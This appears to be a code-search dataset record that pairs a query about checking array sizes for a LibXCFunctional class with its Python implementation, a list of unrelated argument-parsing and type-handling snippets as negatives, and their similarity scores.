_s ) \n _args.append ( ROOT.RooFit.Minos ( _s ) )\n \n elif kup in ( 'SAVE' , ) and isinstance ( a , bool ) :\n _args.append ( ROOT.RooFit.Save ( a ) )\n elif kup in ( 'CLONE' ,\n 'CLONEDATA' ) and isinstance ( a , bool ) :\n _args.append ( ROOT.RooFit.CloneData ( a ) )\n elif kup in ( 'OFFSET' ) and isinstance ( a , bool ) :\n _args.append ( ROOT.RooFit.Offset ( a ) )\n elif kup in ( 'FITOPTIONS' ,\n 'FITOPTION' ) and isinstance ( a , string_types ) :\n _args.append ( ROOT.RooFit.FitOptions ( a ) )\n \n elif kup in ( 'CONSTRAINT' ,\n 'CONSTRAINTS' ,\n 'PARS' ,\n 'PARAMS' ,\n 'PARAMETER' ,\n 'PARAMETERS' ) :\n c = self.parse_constraints ( a )\n if c is None : self.error ('parse_args: Invalid constraint specification: %s/%s' % ( a , type ( a ) ) )\n else : _args.append ( c ) \n \n else :\n \n self.error ( 'parse_args: Unknown/illegal keyword argument: %s/%s, skip it ' % ( k , type ( a ) ) )\n \n \n if not check_arg ( 'numcpu' , *_args ) :\n if dataset and not isinstance ( dataset , ROOT.RooDataHist ) :\n _args.append ( ncpu ( len ( dataset ) ) )\n else :\n nc = numcpu()\n if 1 < nc : _args.append ( ROOT.RooFit.NumCPU ( nc ) )\n\n \n # =============================================================\n ## check options for the weighted datasets \n if dataset :\n \n weighted = dataset.isWeighted () \n sw2 = check_arg ( 'SumW2Error' , *_args )\n aer = check_arg ( 'AsymptoticError' , *_args )\n\n if sw2 and aer :\n logger.warning ( \"parse_args: Both ``SumW2Error'' and ``AsymptoticError'' are specified\" ) \n if weighted and sw2 :\n value = bool ( sw2.getInt( 0 ) )\n if not value : logger.warning (\"parse_args: 'SumW2=False' is specified for the weighted dataset!\")\n elif weighted and aer : \n value = bool ( aer.getInt( 0 ) )\n if not value : logger.warning (\"parse_args: 'AsymptoticError=False' is specified for the weighted dataset!\")\n ## elif weighted : \n ## logger.warning ( \"parse_args: Neither ``SumW2Error'' and ``AsymptoticError'' are specified for weighted dataset! 
``SumW2=True'' is added\" )\n ## _args.append ( ROOT.RooFit.SumW2Error ( True ) ) \n elif not weighted and sw2 :\n logger.warning ( \"parse_args:``SumW2Error'' is specified for non-weighted dataset\" )\n elif not weighted and aer :\n logger.warning ( \"parse_args:``AsymptoticError'' is specified for non-weighted dataset\" )\n\n keys = [ str ( a ) for a in _args ]\n keys.sort ()\n \n ## check presence of \"non-trivial\" keys\n kset = set( keys ) \n kset.discard ( 'Save' ) ## trivial\n kset.discard ( 'NumCPU' ) ## trivial\n kset.discard ( 'Verbose' ) ## trivial \n kset.discard ( 'Timer' ) ## trivial \n kset.discard ( 'PrintLevel' ) ## trivial\n\n ## duplicates? \n if len ( kset ) != len ( keys ) :\n self.warning (\"duplicated options!\") \n #\n if kset : self.debug ( 'parse_args: Parsed arguments %s' % keys )\n else : self.debug ( 'parse_args: Parsed arguments %s' % keys )\n\n\n ## store them \n self.aux_keep.append ( _args ) \n \n return self.merge_args ( 5 , *_args )", "def _preprocess_typecheck(argSig, argspecs, slf_or_clsm=False):\n # todo: Maybe move also slf-logic here\n vargs = argspecs.varargs\n try:\n kw = argspecs.keywords\n except AttributeError:\n kw = argspecs.varkw\n try:\n kwonly = argspecs.kwonlyargs\n except AttributeError:\n kwonly = None\n if not vargs is None or not kw is None:\n arg_type_lst = list(get_Tuple_params(argSig))\n if not vargs is None:\n vargs_pos = (len(argspecs.args)-1) \\\n if slf_or_clsm else len(argspecs.args)\n # IndexErrors in this section indicate that a child-method was\n # checked against a parent's type-info with the child featuring\n # a more wider type on signature level (e.g. adding vargs)\n try:\n vargs_type = typing.Sequence[arg_type_lst[vargs_pos]]\n except IndexError:\n vargs_type = typing.Sequence[typing.Any]\n try:\n arg_type_lst[vargs_pos] = vargs_type\n except IndexError:\n arg_type_lst.append(vargs_type)\n if not kw is None:\n kw_pos = len(argspecs.args)\n if slf_or_clsm:\n kw_pos -= 1\n if not vargs is None:\n kw_pos += 1\n if not kwonly is None:\n kw_pos += len(kwonly)\n try:\n kw_type = typing.Dict[str, arg_type_lst[kw_pos]]\n except IndexError:\n kw_type = typing.Dict[str, typing.Any]\n try:\n arg_type_lst[kw_pos] = kw_type\n except IndexError:\n arg_type_lst.append(kw_type)\n return typing.Tuple[tuple(arg_type_lst)]\n else:\n return argSig", "def OSCArgument(next):\n \n if type(next) == type(\"\"): \n OSCstringLength = math.ceil((len(next)+1) / 4.0) * 4\n binary = struct.pack(\">%ds\" % (OSCstringLength), next)\n tag = \"s\"\n elif type(next) == type(42.5):\n binary = struct.pack(\">f\", next)\n tag = \"f\"\n elif type(next) == type(13):\n binary = struct.pack(\">i\", next)\n tag = \"i\"\n else:\n binary = \"\"\n tag = \"\"\n\n return (tag, binary)", "def type_command(ctx, name_from, name_to):", "def arguments(**kw):\n return export_arguments('cc', _all_arguments, _groups, **kw)", "def assign_dll_types(dll):\n dll = init_functions(dll)\n dll = exit_functions(dll)\n \n dll.Asap3GetVersion.argtypes = (ctypes.POINTER(version_t),)\n dll.Asap3GetVersion.restype = ctypes.c_bool\n\n # Asap3SetInteractiveMode\n dll.Asap3SetInteractiveMode.argtypes = (\n TAsap3Hdl,\n ctypes.c_bool,\n )\n dll.Asap3SetInteractiveMode.restype = ctypes.c_bool\n\n # Asap3GetInteractiveMode\n dll.Asap3GetInteractiveMode.argtypes = (\n TAsap3Hdl,\n ctypes.POINTER(ctypes.c_bool),\n )\n dll.Asap3GetInteractiveMode.restype = ctypes.c_bool\n\n \n # Asap3GetProjectDirectory\n dll.Asap3GetProjectDirectory.argtypes=(TAsap3Hdl, 
ctypes.POINTER(type(ctypes.create_string_buffer(b\"\", 255))), ctypes.POINTER(ctypes.c_ulong))\n dll.Asap3GetProjectDirectory.restype=ctypes.c_bool\n return dll", "def parse_arguments():\n parser = argparse.ArgumentParser(description=\"Parse library type information.\")\n parser.add_argument(\"input_file\", help=\"Salmon library type information file.\")\n return parser.parse_args()", "def getTCSargs():\n try:\n nameIndex, portIndex = sys.argv.index(\"-n\"), sys.argv.index(\"-e\")\n if abs(nameIndex - portIndex) > 1:\n if isinstance(sys.argv[nameIndex+1],str) and isinstance(sys.argv[portIndex+1], int):\n return [sys.argv[nameIndex+1], int(sys.argv[portIndex+1])]\n except ValueError as error:\n return [\"localhost\", 58044]\n except IndexError as error:\n return [\"localhost\", 58044]\n return [\"localhost\", 58044]", "def convert_args(sys_argv, sys_word, sys_mat, sys_directions,\r\n wanted_directions):\r\n if len(sys_argv) != 5:\r\n print(PARAMETER_ERROR)\r\n elif os.path.isfile(sys_word) is False:\r\n print(WORD_ERROR + sys_word + MISSING_ERROR)\r\n elif os.path.isfile(sys_mat) is False:\r\n print(MATRIX_ERROR + sys_mat + MISSING_ERROR)\r\n elif directions_validity(sys_directions, wanted_directions) is False:\r\n print(DIRECTION_ERROR)\r\n else:\r\n return True", "def testcliparams(c, name=\"def\"):\n print(name)", "def main(**opts: tp.Any) -> None:", "def parseArgs ():\n independentBaseName = None\n dependentBaseName = None\n independentTSID = None\n dependentTSID = None\n statisticsFile = None\n nEquations = None\n logFile = None\n #\n # Loop through command line arguments\n for arg in sys.argv:\n parts = arg.split('=')\n if ( (parts == None) or (len(parts) != 2) ):\n # Not an arg=value command line argument\n continue\n argName = parts[0].upper()\n argValue = parts[1]\n if ( argName == 'DEPENDENTBASENAME' ):\n dependentBaseName = argValue\n elif ( argName == 'DEPENDENTTSID' ):\n dependentTSID = argValue\n elif ( argName == 'INDEPENDENTBASENAME' ):\n independentBaseName = argValue\n elif ( argName == 'INDEPENDENTTSID' ):\n independentTSID = argValue\n elif ( argName == 'LOGFILE' ):\n logFile = argValue\n elif ( argName == 'NUMBEROFEQUATIONS' ):\n nEquations = int(argValue)\n elif ( argName == 'STATISTICSFILE' ):\n statisticsFile = argValue\n return ( independentBaseName, dependentBaseName, independentTSID, dependentTSID,\n statisticsFile, nEquations, logFile )", "def parameterTypes(self, p_int): # real signature unknown; restored from __doc__\n return []", "def supported_table_args(self) -> t.Tuple[str, ...]:", "def get_args():\n parser = argparse.ArgumentParser(description='', prog='label.py')\n parser.add_argument('-v',\n '--version',\n action='version',\n version='%(prog)s {}'.format('version'))\n\n parser.add_argument('-t',\n '--template',\n metavar='<template>',\n type=str,\n help='')\n\n parser.add_argument('--printer',\n help='Printer')\n\n parser.add_argument('-s',\n '--string',\n action='store',\n help='Label Content')\n\n parser.add_argument('--listprinter',\n required=False,\n action='store_true',\n # metavar='',\n help='List Printer')\n parser.add_argument('--listtemplates',\n required=False,\n action='store_true',\n # metavar='',\n help='List templates')\n\n parser.add_argument('-p',\n action='store_true',\n help='preview')\n\n parser.add_argument('-P',\n '--printit',\n action='store_true',\n help='Print Label')\n\n parser.add_argument('-d',\n '--debug',\n action='store',\n # choices=['info', 'warning'],\n help='Debug mode')\n\n parser.add_argument('-a',\n '--amount',\n 
action='store',\n type=int,\n metavar='int',\n help='Print label n times')\n\n parser.add_argument('-c',\n required=False,\n action='store_true',\n help='clean up temp files')\n\n\n# parser.add_argument('-C',\n# '--conf',\n# required=False,\n# action='store_true',\n# help='Load another conf file')\n\n args = parser.parse_args()\n\n printer = args.printer\n textemplate = args.template\n string = args.string\n printers = args.listprinter\n preview = args.p\n printit = args.printit\n debug = args.debug\n amount = args.amount\n cleanup = args.c\n templates = args.listtemplates\n\n return printer, textemplate, string, printers, preview, printit, debug, amount, cleanup, templates", "def parser_arguments():\n parser = argparse.ArgumentParser(prog = 'OIDv6_ToolKit',\n usage = 'python3 %(prog)s [command] --classe [option] --limit [option] --location [option]',\n description='This programm allows to download images from OIDv6')\n parser.add_argument(\"command\",\n metavar= \"<command>: 'getURL', 'downloader' or 'listClasses'.\",\n help = \"'getURL' or 'listClasses'.\")\n parser.add_argument('--classes', required=False, nargs='+',\n metavar=\"list of classes\",\n help=\"Sequence of 'strings' of the wanted classes\")\n parser.add_argument('--limit', required=False, type=int, default=None,\n metavar=\"integer number\",\n help='Optional limit on number of images to download')\n parser.add_argument('--location',required=False, nargs='+',\n metavar='where to download',\n help=\"where to download: local repository or Minio serveur\")\n\n args = parser.parse_args()\n return args", "def svn_client_args_to_target_array(apr_array_header_t_targets_p, apr_getopt_t_os, apr_array_header_t_known_targets, svn_client_ctx_t_ctx, apr_pool_t_pool): # real signature unknown; restored from __doc__\n pass", "def get_argumets():\n\n parser = argparse.ArgumentParser( description='Interactive 6DoF pose annotator')\n parser.add_argument('--cimg', type=str, default='data/rgb.png',\n help='file name of the RGB image of the input scene.')\n parser.add_argument('--dimg', type=str, default='data/depth.png',\n help='file name of the depth image of the input scene. 
We assume that RGB and depth image have pixel-to-pixel correspondence.')\n parser.add_argument('--intrin', type=str, default='data/realsense_intrinsic.json',\n help='file name of the camera intrinsic.')\n parser.add_argument('--model', type=str, default='data/hammer_mm.ply',\n help='file name of the object model (.pcd or .ply).')\n parser.add_argument('--init', type=str, default='data/init.json',\n help='file name of the initial transformation (.json).')\n \n return parser.parse_args()", "def get_args():\r\n\r\n ap = argparse.ArgumentParser(add_help=False,\r\n description='Arguments for training Goturn Tracker')\r\n ap.add_argument('--npus', type=int, default=1,\r\n help='number of npus, 0: means no npu, -1 to use all \\\r\n npus, 1 = use one npu, 2 = use two npus')\r\n ap.add_argument('--device', type=int, default=0, help='which npu to train')\r\n # Data settings\r\n ap.add_argument('--imagenet_path', type=str,\r\n required=True, help='path to imagenet folder, this \\\r\n folder shoud have images and gt folder')\r\n ap.add_argument('--alov_path', type=str,\r\n required=True, help='path to ALOV folder, this \\\r\n folder should have images and gt folder')\r\n\r\n # architecture and hyperparameters\r\n ap.add_argument('--arch', default='alexnet',\r\n choices={'alexnet'}, help='model architecture, \\\r\n default: alexnet, currently only alexnet is \\\r\n supported')\r\n ap.add_argument('--pretrained_model',\r\n default='../goturn/models/pretrained/alexnet.pth.tar',\r\n help='Path to pretrained model')\r\n ap.add_argument('--epochs', default=90,\r\n type=int, help='number of total epochs to run')\r\n ap.add_argument('--batch_size', default=3,\r\n type=int, help='number of images per batch')\r\n ap.add_argument('--max_steps', default=None,\r\n type=int, help='number of total steps to run')\r\n\r\n # Optimizer settings\r\n ap.add_argument('--lr', default=1e-6, type=float,\r\n help='initial learning rate', dest='lr')\r\n ap.add_argument('--momentum', default=0.9, type=float, help='momentum')\r\n ap.add_argument('--wd', default=5e-4, type=float, help='weight decay (default: 5e-4)',\r\n dest='wd')\r\n ap.add_argument('--lr_step', default=1, type=int,\r\n help='Number of epoch after which we change the learning rate',\r\n dest='lr_step')\r\n ap.add_argument('--gamma', default=0.1, type=float,\r\n help='multiplicative factor for learning rate',\r\n dest='gamma')\r\n\r\n # reproducibility\r\n ap.add_argument('--seed', type=int, default=42, help='seed value')\r\n # ap.add_argument('--seed', type=int, default=800, help='seed value')\r\n\r\n # save path\r\n ap.add_argument('--save_path', default=\".\", type=str, help='path to save output')\r\n\r\n # goturn specific arguments\r\n ap = GoturnTrain.add_model_specific_args(ap)\r\n return ap.parse_args()", "def prepare_arguments(self, ftyp, args):\n # Determine fixed and variable arguments:\n if ftyp.is_vararg:\n fixed_amount = len(ftyp.arguments)\n fixed_args = args[:fixed_amount]\n var_args = args[fixed_amount:]\n else:\n fixed_args = args\n var_args = []\n\n # Evaluate arguments:\n ir_arguments = []\n\n # If return value is complex, reserve room for it an pass pointer\n if ftyp.return_type.is_struct:\n size, alignment = self.data_layout(ftyp.return_type)\n rval_alloc = self.emit(ir.Alloc(\"rval_alloc\", size, alignment))\n rval_ptr = self.emit(ir.AddressOf(rval_alloc, \"rval_ptr\"))\n ir_arguments.append(rval_ptr)\n else:\n rval_alloc = None\n\n # Place other arguments:\n for argument in fixed_args:\n value = self.gen_expr(argument, rvalue=True)\n 
ir_arguments.append(value)\n\n # Handle variable arguments:\n if ftyp.is_vararg:\n vararg_ptr = self.gen_fill_varargs(var_args)\n ir_arguments.append(vararg_ptr)\n else:\n assert not var_args\n\n return ir_arguments, rval_alloc", "def Args(parser):\n parser.add_argument('name', help='Type name.')\n parser.add_argument('--provider',\n help='Type provider name or its self-link.',\n required=True)", "def _build_instance_count_and_type_args(self, master_instance_type,\r\n slave_instance_type, num_instances):\r\n params = {\r\n 'Instances.MasterInstanceType' : master_instance_type,\r\n 'Instances.SlaveInstanceType' : slave_instance_type,\r\n 'Instances.InstanceCount' : num_instances,\r\n }\r\n return params", "def convert_args(self):\n try:\n spec = _action_args_dict[self.action]\n except KeyError:\n raise Exception('Invalid action: ' + str(action))\n\n def parse_arg(type_, token, name):\n \"\"\"Converts token to type type_.\n \n This includes special cases for some argument types,\n such as Card, bool, and NoneType.\n \"\"\"\n if type_ is Card and token is not None and type(token) is not Card:\n try:\n arg = Card(int(token))\n except ValueError:\n raise GameActionError(\n 'Error converting \"{0}\" argument: {1} token: \"{2}\"'\n .format(name, str(type_), token))\n\n return arg\n\n else:\n return token\n\n\n req_tokens = self.args[:spec.n_req_args]\n req_args = []\n\n for i, tok, (typ, name) in izip(count(), req_tokens, spec.required_arg_specs):\n try:\n arg = parse_arg(typ, tok, name)\n except GameActionError, e:\n # If we failed in parse_arg, message can be appended for details\n raise\n #raise GameActionError(\n # 'Could not convert argument {0}. '.format(i) + e.message)\n\n req_args.append(arg)\n\n\n extended_tokens = self.args[spec.n_req_args:]\n extended_args = []\n \n for i, tok in izip(count(spec.n_req_args), extended_tokens):\n typ, name = spec.extended_arg_spec\n try:\n arg = parse_arg(typ, tok, name)\n except GameActionError, e:\n # If we failed in parse_arg, message can be appended for details\n raise GameActionError(\n 'Could not convert argument {0}. '.format(i) + e.message)\n\n extended_args.append(arg)\n\n self.args = req_args + extended_args" ]
[ "0.6376518", "0.58763367", "0.58502054", "0.5712465", "0.5642069", "0.5633545", "0.56088585", "0.5531215", "0.5515016", "0.550904", "0.5504691", "0.5500384", "0.54895383", "0.5458106", "0.5442237", "0.53984636", "0.5386691", "0.5374875", "0.53544724", "0.5347694", "0.5341656", "0.5330729", "0.53167206", "0.5298466", "0.5288069", "0.52814376", "0.52719194", "0.526808", "0.52661186", "0.5257266", "0.5256252", "0.52499235", "0.52421695", "0.523948", "0.523786", "0.5237173", "0.52351606", "0.5231834", "0.5213423", "0.52131355", "0.52026385", "0.5200033", "0.519791", "0.51948047", "0.51936597", "0.5186599", "0.5185236", "0.5180686", "0.51777995", "0.5166358", "0.51543736", "0.5147955", "0.5145749", "0.5133823", "0.5129392", "0.51238716", "0.51147854", "0.51145244", "0.5110281", "0.5109531", "0.510757", "0.5102361", "0.5097067", "0.50943106", "0.508866", "0.5081127", "0.50780606", "0.5077894", "0.50702566", "0.5067872", "0.50627697", "0.5062611", "0.5054169", "0.5051104", "0.50454617", "0.50450784", "0.50415426", "0.5041265", "0.50393766", "0.5031265", "0.50303197", "0.50258565", "0.50234544", "0.50225246", "0.50221205", "0.5021005", "0.5015285", "0.50094754", "0.5008192", "0.499918", "0.4993761", "0.49935496", "0.4991666", "0.49890697", "0.49875504", "0.49862432", "0.49857524", "0.49854046", "0.49840266", "0.49835166" ]
0.6243665
1
A specialized function built to construct and check the sizes of arrays given to the LibXCFunctional class.
def _check_arrays(current_arrays, fields, sizes, factor, required): # Nothing supplied so we build it out if current_arrays is None: current_arrays = {} for label in fields: if required: size = sizes[label] current_arrays[label] = np.zeros((factor, size)) else: current_arrays[label] = None # np.empty((1)) return current_arrays
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _checkSize(X1,X2):\n \n if len(X1) != len(X2):\n raise ValueError, 'Lists are differnt lengths'", "def check_array_shape(logger, arr, name, expected_shape):\n shape = arr.shape\n check_array_ndim(arr, name, len(expected_shape))\n for i in range(len(shape)):\n check_array_dim(logger, arr, name, expected_shape[i], i)\n\n return arr", "def _validate_elem_length(max_num_levels, elems_flat, axis):\n assertions = []\n\n elem_length = ps.shape(elems_flat[0])[axis]\n\n # The default size limit will overflow a 32-bit int, so make sure we're\n # using 64-bit.\n size_limit = 2**(ps.cast(max_num_levels, np.int64) + 1)\n enough_levels = ps.less(ps.cast(elem_length, np.int64), size_limit)\n enough_levels_ = tf.get_static_value(enough_levels)\n if enough_levels_ is None:\n assertions.append(\n tf.debugging.assert_equal(\n enough_levels, True,\n message='Input `Tensor`s must have dimension less than'\n ' `2**(max_num_levels + 1)` along `axis=={}`.'\n ' (saw: {} which is not less than 2**{} == {})'.format(\n axis,\n elem_length,\n max_num_levels,\n size_limit)))\n elif not enough_levels_:\n raise ValueError(\n 'Input `Tensor`s must have dimension less than'\n ' `2**(max_num_levels + 1)` along `axis == {}`'\n ' (saw: {} which is not less than 2**{} == {})'.format(\n axis,\n elem_length,\n max_num_levels,\n size_limit))\n\n is_consistent = ps.reduce_all([ps.equal(ps.shape(elem)[axis], elem_length)\n for elem in elems_flat[1:]])\n\n is_consistent_ = tf.get_static_value(is_consistent)\n if is_consistent_ is None:\n assertions.append(\n tf.debugging.assert_equal(\n is_consistent, True,\n message='Inputs must have the same size along the given axis.'\n ' (saw: {})'.format([elem.shape for elem in elems_flat])))\n elif not is_consistent_:\n raise ValueError(\n 'Inputs must have the same size along the given axis.'\n ' (saw: {})'.format([elem.shape for elem in elems_flat]))\n return elem_length, assertions", "def __DimSiz_restriction_correct_ndarray_ndarray_pedantic3(self):\n\n strTestName = 'The size of a dimension of a Numpy array higher or equal to the size of a dimension of another Numpy array [pedantic] (3) (correct)'\n RxCSObject = _RxCSobject()\n\n # Firstly, let us define a reference parameter\n RxCSObject.paramAddMan('aParameter1', 'Numpy array parameter')\n RxCSObject.paramType('aParameter1', np.ndarray)\n\n # Now, let us define a Numpy Array\n RxCSObject.paramAddMan('parameter1', 'Numpy array parameter')\n RxCSObject.paramType('parameter1', np.ndarray)\n RxCSObject.paramDimHE('parameter1', 'aParameter1', 'rows', 'columns', pedantic=1, add=1)\n\n RxCSObject.parameter1 = np.random.randn(4, 3, 4)\n RxCSObject.aParameter1 = np.random.randn(3, 2)\n\n self.__parametersCheck_error(RxCSObject, 'correct', strTestName)", "def test_batch_size_pack_size():", "def size(*args):", "def test_iterable_len(self):\n for iterable_len, expected_size in [(5, 5), (150, 100), (None, 100)]:\n with self.subTest(iterable_len=iterable_len):\n iterable_of_args, iterable_len_, chunk_size, n_splits = apply_numpy_chunking(\n self.test_data_numpy, iterable_len=iterable_len, n_splits=1\n )\n\n # Materialize generator and test contents\n iterable_of_args = list(iterable_of_args)\n self.assertEqual(len(iterable_of_args), 1)\n self.assertIsInstance(iterable_of_args[0][0], np.ndarray)\n np.testing.assert_array_equal(iterable_of_args[0][0], self.test_data_numpy[:expected_size])\n\n # Test other output\n self.assertEqual(iterable_len_, 1)\n self.assertEqual(chunk_size, 1)\n self.assertIsNone(n_splits)", "def test_size_check(self):\n 
[x1, y1, s1, g1] = self.data.diffusion_data.shape\n [x2, y2, s2, g2] = module_05.run_module(self.data).diffusion_data.shape\n self.assertEqual(x1, x2)\n self.assertEqual(y1, y2)\n self.assertEqual(s1, s2)\n self.assertEqual(g1, g2)", "def test_allowed_arg_sizes(submit_function_and_get_result, endpoint, size):\n r = submit_function_and_get_result(\n endpoint, func=large_arg_consumer, func_args=(bytearray(size),)\n )\n assert r.result == size", "def __DimSiz_restriction_correct_ndarray_ndarray3(self):\n\n strTestName = 'The size of a dimension of a Numpy array higher than the size of a dimension of another Numpy array (3) (correct)'\n RxCSObject = _RxCSobject()\n\n # Firstly, let us define a reference parameter\n RxCSObject.paramAddMan('aParameter1', 'Numpy array parameter')\n RxCSObject.paramType('aParameter1', np.ndarray)\n\n # Now, let us define a Numpy Array\n RxCSObject.paramAddMan('parameter1', 'Numpy array parameter')\n RxCSObject.paramType('parameter1', np.ndarray)\n RxCSObject.paramDimH('parameter1', 'aParameter1', 'pages', 'pages', mul=2)\n\n RxCSObject.parameter1 = np.random.randn(10, 3, 4) # *5 pages, 3 rows, 4 columns\n RxCSObject.aParameter1 = np.random.randn(4, 3, 1) # *4 pages, 3 rows, 1 column\n\n self.__parametersCheck_error(RxCSObject, 'correct', strTestName)", "def __DimSiz_restriction_correct_ndarray_number_pedantic(self):\n\n strTestName = 'The size of a dimension of a Numpy array higher or equal to a number [pedantic] (correct)'\n RxCSObject = _RxCSobject()\n\n RxCSObject.paramAddMan('parameter1', 'Numpy array parameter')\n RxCSObject.paramType('parameter1', np.ndarray)\n RxCSObject.paramDimHE('parameter1', 3, 'rows', pedantic=1)\n\n RxCSObject.parameter1 = np.random.randn(3, 3)\n\n self.__parametersCheck_error(RxCSObject, 'correct', strTestName)", "def test_check_X_too_many_dims():\n with pytest.raises(ValueError):\n check_X(np.ones((5,4,3)))", "def __DimSiz_restriction_correct_ndarray_number(self):\n\n strTestName = 'The size of a dimension of a Numpy array higher or equal to a number (correct)'\n RxCSObject = _RxCSobject()\n\n RxCSObject.paramAddMan('parameter1', 'Numpy array parameter')\n RxCSObject.paramType('parameter1', np.ndarray)\n RxCSObject.paramDimHE('parameter1', 3, 1) # Size of dimension 1 must be higher than 3'\n\n RxCSObject.parameter1 = np.random.randn(3, 3)\n\n self.__parametersCheck_error(RxCSObject, 'correct', strTestName)", "def __DimSiz_restriction_correct_ndarray_number_pedantic2(self):\n\n strTestName = 'The size of a dimension of a Numpy array higher or equal to a number (2) [pedantic] (correct)'\n RxCSObject = _RxCSobject()\n\n RxCSObject.paramAddMan('parameter1', 'Numpy array parameter')\n RxCSObject.paramType('parameter1', np.ndarray)\n RxCSObject.paramDimHE('parameter1', 3, 'pages', pedantic=1)\n\n RxCSObject.parameter1 = np.random.randn(10, 3, 3)\n\n self.__parametersCheck_error(RxCSObject, 'correct', strTestName)", "def test_ncols_gtiff_array(self):\n self.assertEqual(_test_array(landsat_gtiff).shape[2], 235)", "def check_consistent_length(arrays: Sequence[npt.ArrayLike]) -> None:\n lengths = [_num_samples(X) for X in arrays if X is not None]\n uniques = np.unique(lengths)\n if len(uniques) > 1:\n raise ValueError(\n \"Found input variables with inconsistent numbers of\" \" samples: %r\" % [int(length) for length in lengths]\n )", "def __DimSiz_restriction_correct_ndarray_number2(self):\n\n strTestName = 'The number of columns of a Numpy array lower or equal to a number (correct)'\n RxCSObject = _RxCSobject()\n\n 
RxCSObject.paramAddMan('parameter1', 'Numpy array parameter')\n RxCSObject.paramType('parameter1', np.ndarray)\n RxCSObject.paramDimLE('parameter1', 3, 'columns')\n\n RxCSObject.parameter1 = np.random.randn(3)\n\n self.__parametersCheck_error(RxCSObject, 'correct', strTestName)", "def lengths(x: Any) -> IntOrIter:\n if is_scalar(x):\n return Array([1], dtype=numpy.int_)\n return Array([length(elem) for elem in x], dtype=numpy.int_)", "def __DimSiz_restriction_correct_ndarray_ndarray_pedantic(self):\n\n strTestName = 'The size of a dimension of a Numpy array lower or equal to the size of a dimension of another Numpy array [pedantic] (correct)'\n RxCSObject = _RxCSobject()\n\n # Firstly, let us define a reference parameter\n RxCSObject.paramAddMan('aParameter1', 'Numpy array parameter')\n RxCSObject.paramType('aParameter1', np.ndarray)\n\n # Now, let us define a Numpy Array\n RxCSObject.paramAddMan('parameter1', 'Numpy array parameter')\n RxCSObject.paramType('parameter1', np.ndarray)\n RxCSObject.paramDimLE('parameter1', 'aParameter1', 'pages', 'rows', pedantic=1)\n\n RxCSObject.parameter1 = np.random.randn(2, 3, 4) # * 12 pages, 3 rows, 4 columns\n RxCSObject.aParameter1 = np.random.randn(4, 3, 1) # 4 pages, * 3 rows, 1 column\n\n self.__parametersCheck_error(RxCSObject, 'correct', strTestName)", "def get_length(array):\n return len(list(array))", "def _CheckLengthOrExpand(param_per_dataset, expected_len, param_name):\n if param_per_dataset is None:\n return None\n if isinstance(param_per_dataset, list):\n if len(param_per_dataset) != expected_len:\n raise ValueError(f'{param_name} doesn\\'t match the size of '\n f'eval_dataset_names: {len(param_per_dataset)} vs '\n f'{expected_len}.')\n else:\n param_per_dataset = [param_per_dataset] * expected_len\n return param_per_dataset", "def ndarray_size(self) -> int:\n pass", "def test_ncols_vrt_array(self):\n self.assertEqual(_test_array(landsat_vrt).shape[2], 235)", "def arraySize( cls, value, typeCode = None ):\n return value.size", "def test_array(self):\n htype = h5t.py_create(('f',(2,2)))\n self.assertIsInstance(htype, h5t.TypeArrayID)\n self.assertEqual(htype.get_array_dims(), (2,2))", "def __len__():", "def __len__():", "def __len__():", "def __DimSiz_restriction_correct_ndarray_ndarray_pedantic2(self):\n\n strTestName = 'The size of a dimension of a Numpy array higher than the size of a dimension of another Numpy array [pedantic] (2) (correct)'\n RxCSObject = _RxCSobject()\n\n # Firstly, let us define a reference parameter\n RxCSObject.paramAddMan('aParameter1', 'Numpy array parameter')\n RxCSObject.paramType('aParameter1', np.ndarray)\n\n # Now, let us define a Numpy Array\n RxCSObject.paramAddMan('parameter1', 'Numpy array parameter')\n RxCSObject.paramType('parameter1', np.ndarray)\n RxCSObject.paramDimH('parameter1', 'aParameter1', 'pages', 'columns', pedantic=1, add=1)\n\n RxCSObject.parameter1 = np.random.randn(4, 3, 4) # *3 rows, 4 columns\n RxCSObject.aParameter1 = np.random.randn(3, 2) # 3 rows, * 2 columns\n\n self.__parametersCheck_error(RxCSObject, 'correct', strTestName)", "def __sizeof__(*args):", "def __sizeof__(*args):", "def __sizeof__(*args):", "def __sizeof__(*args):", "def __sizeof__(*args):", "def __sizeof__(*args):", "def __sizeof__(*args):", "def __sizeof__(*args):", "def __sizeof__(*args):", "def __sizeof__(*args):", "def __sizeof__(*args):", "def __sizeof__(*args):", "def __sizeof__(*args):", "def __sizeof__(*args):", "def __sizeof__(*args):", "def __sizeof__(*args):", "def __sizeof__(*args):", "def 
__sizeof__(*args):", "def __sizeof__(*args):", "def test_list_of_equal_len():\n\n @type_checked\n def _run_test(something:[str, int, bool]):\n assert isinstance(something[0], str)\n assert isinstance(something[1], int)\n assert isinstance(something[2], bool)\n\n _run_test(something=[None, \"12\", 1])", "def __DimSiz_restriction_correct_ndarray_parameter_pedantic(self):\n\n strTestName = 'The size of a dimension of a Numpy array lower or equal to a parameter [pedantic] (correct)'\n RxCSObject = _RxCSobject()\n\n # Firstly, let us define a reference parameter\n RxCSObject.paramAddMan('iParameter1', 'Int parameter')\n RxCSObject.paramType('iParameter1', int)\n\n # Now, let us define a Numpy Array\n RxCSObject.paramAddMan('parameter1', 'Numpy array parameter')\n RxCSObject.paramType('parameter1', np.ndarray)\n RxCSObject.paramDimLE('parameter1', 'iParameter1', 'rows', pedantic=1)\n\n RxCSObject.iParameter1 = 10\n RxCSObject.parameter1 = np.random.randn(2, 4, 7)\n\n self.__parametersCheck_error(RxCSObject, 'correct', strTestName)", "def __DimSiz_restriction_incorrect_ndarray_ndarray_pedantic3(self):\n\n strTestName = 'The size of a dimension of a Numpy array higher than the size of a dimension of another Numpy array [pedantic] (3) (incorrect)'\n RxCSObject = _RxCSobject()\n\n # Firstly, let us define a reference parameter\n RxCSObject.paramAddMan('aParameter1', 'Numpy array parameter')\n RxCSObject.paramType('aParameter1', np.ndarray)\n\n # Now, let us define a Numpy Array\n RxCSObject.paramAddMan('parameter1', 'Numpy array parameter')\n RxCSObject.paramType('parameter1', np.ndarray)\n RxCSObject.paramDimHE('parameter1', 'aParameter1', 1, 'pages', pedantic=1)\n\n RxCSObject.parameter1 = np.random.randn(3, 4)\n RxCSObject.aParameter1 = np.random.randn(3, 2)\n\n self.__parametersCheck_error(RxCSObject, ValueError, strTestName)", "def check_array_lengths(inputs, targets, weights=None):\n\n def is_tensor_or_composite_tensor(x):\n return tensor_util.is_tf_type(x) or is_composite_or_composite_value(x)\n\n def set_of_lengths(x):\n # Returns a set with the variation between\n # different shapes, with None => 0\n if x is None:\n return {}\n else:\n return set([\n 